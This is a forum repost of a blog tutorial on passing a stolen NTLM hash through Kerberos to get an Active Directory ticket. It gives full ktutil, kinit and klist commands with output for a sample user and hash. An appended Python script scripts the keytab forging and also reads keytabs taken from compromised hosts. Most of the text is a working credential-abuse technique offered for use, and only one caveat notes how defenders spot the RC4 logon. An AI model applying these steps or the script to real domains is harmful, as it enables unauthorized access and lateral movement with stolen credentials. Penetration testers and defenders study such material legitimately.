Nytro Posted July 30, 2018

Pass the Hash with Kerberos
Jul 24, 2018

This blog post may be of limited use: most of the time, when you have an NTLM hash, you also have the tools to use it. But, if you find yourself in a situation where you don't have those tools and do happen to have Kerberos tools (ktutil, kinit, klist), you can pass the hash with them.

Let's say we have the NTLM hash for the user uberuser and the hash is 88e4d9fabaecf3dec18dd80905521b29.

The first step is to create a keytab file using ktutil:

root@wpad:~# ktutil

At the ktutil prompt, type in the "add entry" (addent) command with the "principal" (-p) flag. Specify the user and the Kerberos realm, which for Active Directory is the domain's FQDN in all uppercase. Then the "KVNO" (-k 1), which is the key version number, and the -key flag so that ktutil asks for the key itself instead of a password. Finally the encryption type, which is rc4-hmac for NTLM hashes, because the RC4-HMAC Kerberos key for an account is exactly its NT hash:

ktutil: addent -p uberuser@CORP.SOMEWHATREALNEWS.COM -k 1 -key -e rc4-hmac

After you hit enter you'll get prompted for the rc4-hmac (NTLM) hash, in hex:

Key for uberuser@CORP.SOMEWHATREALNEWS.COM (hex): 88e4d9fabaecf3dec18dd80905521b29

Then we write the keytab file to disk and exit ktutil:

ktutil: wkt /tmp/a.keytab
ktutil: exit

The last step before we can use our authentication is to request a Kerberos ticket (a TGT) using our keytab file. -k -t selects keytab authentication, -V prints what kinit is doing, and -f asks for a forwardable ticket:

root@wpad:~# kinit -V -k -t /tmp/a.keytab -f uberuser@CORP.SOMEWHATREALNEWS.COM
Using default cache: /tmp/krb5cc_0
Using principal: uberuser@CORP.SOMEWHATREALNEWS.COM
Using keytab: /tmp/a.keytab
Authenticated to Kerberos v5

Validate it with klist:

root@wpad:~# klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: uberuser@CORP.SOMEWHATREALNEWS.COM

Valid starting       Expires              Service principal
07/22/2018 21:38:43  07/23/2018 07:38:43  krbtgt/CORP.SOMEWHATREALNEWS.COM@CORP.SOMEWHATREALNEWS.COM
        renew until 07/23/2018 21:38:40

The TGT now sits in /tmp/krb5cc_0 and any Kerberos-aware client on the box (smbclient -k, ssh with GSSAPI, curl --negotiate, and so on) will use it. Two caveats: this only works if the KDC is still willing to issue that account a ticket using RC4-HMAC, because the AES keys are derived from the password with a salt and cannot be computed from the NT hash; and on the domain controller this shows up as a Kerberos logon with RC4 encryption (the same tell that a Mimikatz "overpass-the-hash" leaves), which is worth knowing on both sides of the engagement.

Source: https://malicious.link/post/2018/pass-the-hash-with-kerberos/
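ktutil is interactive and does not take the key on the command line, which is awkward when you want to script the steps above. The following is an added example, not code from the post or from its author: it writes the same keytab entry that the addent/wkt steps produce, as a version-2 MIT keytab with one rc4-hmac (enctype 23) key, and reads it back so you can see exactly what the file contains. The function names and the on-disk values (timestamp, the user and hash from the post) are my own choices; the file layout is the documented MIT keytab format.

```python
"""Build (and read back) an MIT-format keytab holding an NT hash as an
rc4-hmac key, i.e. what the ktutil 'addent ... -e rc4-hmac' step produces.
Added example, not the original post's code; function names are hypothetical."""
import struct
import time
from typing import Dict, List, Optional

KEYTAB_VERSION = b"\x05\x02"   # MIT keytab file format version 2
ENCTYPE_RC4_HMAC = 23          # RFC 4757: the key is the raw 16-byte NT hash
KRB5_NT_PRINCIPAL = 1          # name type used for user principals


def _counted(data: bytes) -> bytes:
    """Keytab 'counted octet string': 16-bit big-endian length + bytes."""
    return struct.pack(">H", len(data)) + data


def _read_counted(blob: bytes, pos: int):
    (n,) = struct.unpack_from(">H", blob, pos)
    pos += 2
    return blob[pos:pos + n], pos + n


def build_keytab(user: str, realm: str, nt_hash_hex: str, kvno: int = 1,
                 timestamp: Optional[int] = None) -> bytes:
    """Return keytab bytes with one rc4-hmac entry for user@REALM."""
    key = bytes.fromhex(nt_hash_hex)
    if len(key) != 16:
        raise ValueError("an NT hash is 16 bytes (32 hex characters)")
    if timestamp is None:
        timestamp = int(time.time())
    entry = struct.pack(">H", 1)                    # one name component
    entry += _counted(realm.encode())               # realm: uppercase AD FQDN
    entry += _counted(user.encode())                # component: the account name
    entry += struct.pack(">I", KRB5_NT_PRINCIPAL)
    entry += struct.pack(">I", timestamp)
    entry += struct.pack(">B", kvno & 0xFF)         # 8-bit vno
    entry += struct.pack(">HH", ENCTYPE_RC4_HMAC, len(key)) + key
    entry += struct.pack(">I", kvno)                # 32-bit vno (newer field)
    return KEYTAB_VERSION + struct.pack(">i", len(entry)) + entry


def parse_keytab(blob: bytes) -> List[Dict]:
    """Decode every live entry; the same information 'klist -kte' shows."""
    if blob[:2] != KEYTAB_VERSION:
        raise ValueError("not a version-2 MIT keytab")
    pos, entries = 2, []
    while pos + 4 <= len(blob):
        (size,) = struct.unpack_from(">i", blob, pos)
        pos += 4
        if size < 0:                # a negative size marks a deleted slot
            pos += -size
            continue
        end = pos + size
        (ncomp,) = struct.unpack_from(">H", blob, pos)
        pos += 2
        realm, pos = _read_counted(blob, pos)
        comps = []
        for _ in range(ncomp):
            c, pos = _read_counted(blob, pos)
            comps.append(c.decode())
        name_type, ts, vno8 = struct.unpack_from(">IIB", blob, pos)
        pos += 9
        enctype, klen = struct.unpack_from(">HH", blob, pos)
        pos += 4
        key = blob[pos:pos + klen]
        pos += klen
        kvno = vno8
        if end - pos >= 4:          # optional 32-bit vno overrides the 8-bit one
            (kvno,) = struct.unpack_from(">I", blob, pos)
        pos = end
        entries.append({
            "principal": "/".join(comps) + "@" + realm.decode(),
            "name_type": name_type, "timestamp": ts,
            "kvno": kvno, "enctype": enctype, "key": key,
        })
    return entries


if __name__ == "__main__":
    # Same user, realm and hash as the post, written to the post's path.
    kt = build_keytab("uberuser", "CORP.SOMEWHATREALNEWS.COM",
                      "88e4d9fabaecf3dec18dd80905521b29")
    with open("/tmp/a.keytab", "wb") as f:
        f.write(kt)
    for e in parse_keytab(kt):
        print(e["kvno"], e["principal"], "enctype", e["enctype"], e["key"].hex())
    # next: kinit -V -k -t /tmp/a.keytab -f uberuser@CORP.SOMEWHATREALNEWS.COM
```

After running it, `klist -kte /tmp/a.keytab` should list the single entry with KVNO 1 and enctype arcfour-hmac (MIT's name for rc4-hmac), and the post's kinit command works against the file unchanged. The parser is also handy the other way round: point it at a keytab you find on a compromised host and it tells you which principals and key types you just obtained.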